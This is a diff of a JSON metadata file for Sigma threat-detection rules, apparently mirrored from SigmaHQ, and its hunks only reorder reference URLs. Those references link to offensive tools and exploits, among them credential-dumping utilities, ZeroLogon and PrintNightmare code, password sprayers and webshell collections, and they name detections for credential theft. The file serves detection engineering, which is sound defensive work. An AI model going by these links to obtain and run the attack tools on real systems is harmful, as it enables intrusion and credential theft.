 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml"
 ],
 "tags": [
@@ -66166,8 +66166,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mattifestation/status/986280382042595328",
 "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html",
+ "https://twitter.com/mattifestation/status/986280382042595328",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml"
 ],
 "tags": [
@@ -66285,8 +66285,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml"
 ],
 "tags": [
@@ -66393,8 +66393,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
 "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
 "https://twitter.com/pabraeken/status/993298228840992768",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"
 ],
@@ -66448,8 +66448,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml"
 ],
 "tags": [
@@ -66583,8 +66583,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall",
+ "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml"
 ],
 "tags": [
@@ -66617,10 +66617,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nas_bench/status/1535322450858233858",
 "https://twitter.com/CyberRaiju/status/1273597319322058752",
- "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
 "https://twitter.com/bohops/status/1276357235954909188?s=12",
+ "https://twitter.com/nas_bench/status/1535322450858233858",
+ "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml"
 ],
 "tags": [
@@ -66644,10 +66644,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/lefterispan/status/1286259016436514816",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
- "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://twitter.com/lefterispan/status/1286259016436514816",
 "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
+ "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"
 ],
 "tags": [
@@ -66772,8 +66772,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2020/07/06/indirect-command-execution/",
 "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/",
+ "https://pentestlab.blog/2020/07/06/indirect-command-execution/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"
 ],
 "tags": [
@@ -66865,11 +66865,11 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
- "https://github.com/zcgonvh/NTDSDumpEx",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://pentestlab.blog/tag/ntds-dit/",
 "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
+ "https://github.com/zcgonvh/NTDSDumpEx",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
 ],
@@ -66903,9 +66903,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
 "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
 "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml"
 ],
 "tags": [
@@ -66938,11 +66938,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.cobaltstrike.com/help-opsec",
- "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
 "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
+ "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
+ "https://www.cobaltstrike.com/help-opsec",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
 "https://twitter.com/CyberRaiju/status/1251492025678983169",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml"
@@ -67010,9 +67010,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
 "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
 "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
 "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml"
 ],
@@ -67091,8 +67091,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
 "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
+ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml"
 ],
 "tags": [
@@ -67125,8 +67125,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securityxploded.com/",
 "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
+ "https://securityxploded.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml"
 ],
 "tags": [
@@ -67160,9 +67160,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
 "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml"
 ],
 "tags": [
@@ -67253,8 +67253,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
 "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
 ],
 "tags": [
@@ -67424,8 +67424,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
 "https://www.hvs-consulting.de/lazarus-report/",
+ "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml"
 ],
 "tags": [
@@ -67459,8 +67459,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md",
 "https://www.joeware.net/freetools/tools/adfind/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml"
 ],
@@ -67485,8 +67485,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
 "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml"
 ],
 "tags": "No established tags"
@@ -67574,8 +67574,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml"
 ],
 "tags": [
@@ -67608,8 +67608,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool",
 "https://github.com/ch2sh/Jlaive",
+ "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml"
 ],
 "tags": [
@@ -67711,9 +67711,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml"
 ],
 "tags": [
@@ -67804,9 +67804,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml"
 ],
 "tags": [
@@ -67832,10 +67832,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password",
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
- "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt",
 "https://isc.sans.edu/diary/More+Data+Exfiltration/25698",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
+ "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password",
+ "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml"
 ],
 "tags": [
@@ -67955,8 +67955,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
 "https://github.com/sensepost/ruler",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml"
 ],
 "tags": [
@@ -68044,19 +68044,19 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
 "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
 "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
 "https://adsecurity.org/?p=2921",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
 "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/HarmJ0y/DAMP",
 "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/HarmJ0y/DAMP",
 "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/samratashok/nishang",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml"
 ],
 "tags": [
@@ -68289,9 +68289,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt",
- "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
 "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/",
+ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
+ "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml"
 ],
 "tags": [
@@ -68324,8 +68324,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps",
 "https://twitter.com/mrd0x/status/1465058133303246867",
+ "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml"
 ],
 "tags": [
@@ -68384,9 +68384,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0",
- "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
 "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab",
+ "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml"
 ],
 "tags": [
@@ -68419,10 +68419,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/lefterispan/status/1286259016436514816",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
- "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://twitter.com/lefterispan/status/1286259016436514816",
 "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
+ "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"
 ],
 "tags": [
@@ -68626,9 +68626,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
 "https://twitter.com/cyb3rops/status/1514217991034097664",
 "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml"
 ],
 "tags": [
@@ -68670,8 +68670,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/992008180904419328",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/",
+ "https://twitter.com/harr0ey/status/992008180904419328",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"
 ],
 "tags": [
@@ -68704,8 +68704,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19",
 "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml"
 ],
 "tags": [
@@ -68772,8 +68772,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mrd0x/status/1511415432888131586",
 "https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml"
 ],
 "tags": [
@@ -68807,8 +68807,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
 "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"
 ],
 "tags": [
@@ -68856,8 +68856,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml"
 ],
 "tags": [
@@ -69041,8 +69041,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml"
 ],
 "tags": [
@@ -69183,8 +69183,8 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
 "https://twitter.com/mvelazco/status/1410291741241102338",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml"
 ],
@@ -69317,15 +69317,15 @@
 "logsource.category": "antivirus",
 "logsource.product": "No established product",
 "refs": [
- "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
- "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
- "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
- "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
 "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/",
+ "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
 "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection",
 "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
- "https://github.com/tennc/webshell",
 "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
+ "https://github.com/tennc/webshell",
+ "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
+ "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
+ "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml"
 ],
 "tags": [
@@ -69504,9 +69504,9 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
- "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml"
 ],
 "tags": "No established tags"
@@ -69527,8 +69527,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml"
 ],
 "tags": [
@@ -69551,8 +69551,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml"
 ],
 "tags": [
@@ -69575,8 +69575,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml"
 ],
 "tags": [
@@ -69599,8 +69599,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml"
 ],
 "tags": [
@@ -69623,8 +69623,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml"
 ],
 "tags": [
@@ -69647,8 +69647,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml"
 ],
 "tags": [
@@ -69671,8 +69671,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml"
 ],
 "tags": [
@@ -69695,8 +69695,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml"
 ],
 "tags": [
@@ -69719,8 +69719,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
